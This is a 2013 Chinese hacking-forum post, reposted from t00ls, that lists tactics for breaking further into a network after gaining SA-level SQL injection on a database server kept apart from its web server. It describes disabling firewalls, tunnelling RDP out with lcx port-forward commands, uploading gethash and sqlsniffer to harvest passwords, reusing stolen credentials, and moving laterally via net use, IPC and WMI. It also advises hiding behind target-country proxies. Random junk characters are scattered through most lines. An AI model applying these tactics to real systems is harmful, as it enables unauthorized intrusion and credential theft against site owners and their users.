中国网络渗透测试联盟

标题: SA权限网站和数据库分离的一些思路 [打印本页]

作者: admin    时间: 2013-2-16 21:46
标题: SA权限网站和数据库分离的一些思路
当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。: w1 m( s" x$ [4 Z0 W

, s" D, i5 q; g0 R! g7 `( G0 S5 J
6 r4 Z( M( G7 x9 u% q) f4 \  I5 G: Q% d' x
SA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)! L( k) f' z$ H
* @1 I; `6 C* h
' U. i! R& Q, s
一、DB机有公网IP.
# H( K2 S* P- J* W9 m+ P/ H4 Q0 `# t
# x7 s' @5 T, B8 X7 D- H1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.; u" H$ v" R- |- C3 F- W
+ Z, [5 b# D( _) M" }4 }

' `4 i) i2 L7 h, X2 N2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.( D& W" }- J6 D+ G1 ?6 c

! r% W( _# }) t9 F: K4 l
- S8 O# a/ k: k% ]" n3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com  B! C  E1 v# a0 t  k; N' J* m% \
* v- s# f- Z1 l

. a9 `) `" o* F0 I% j, u4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.
$ Z. Q; q7 ~' W+ q) Q5 D8 g0 E% ]  U) @/ u  q5 R

6 o/ M1 q- B7 d6 o3 w3 I, k1 U5 P) R, I% R2 R8 m
二、DB机只有内网IP+ l6 x4 i1 Y, z; p' a2 P+ z8 ~) u5 H
; Z2 T- J$ V  N+ |9 z% B
1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等., a9 {* C/ _$ N& ~, _
. d; I" [) o: X
0 T& S3 i) L; H# ^1 T
2:停掉防火墙和IP策略再从内往外扫描.9 F" ]8 P0 @( n2 s  Q
5 I8 m% a$ D1 L* H
* r* R+ N8 |, U  e
3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.1 k1 [1 [+ P& E& A
, e  O( ?5 [6 w( a; Y6 B1 ^/ j

0 I) g/ M0 E6 W( g/ F4:学会密码规律分析往往会有惊喜.
4 s$ Z, F- z) J
. F7 v6 p7 \, E5 w6 _# f/ S5 [
' n$ k0 C8 c! \( ^0 L5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等
8 G8 _' p, P& c& I
3 }  j# Y  F' S* T
5 \  s+ `/ o2 c5 E, Q- A* l6 s$ g- Z有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的​




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2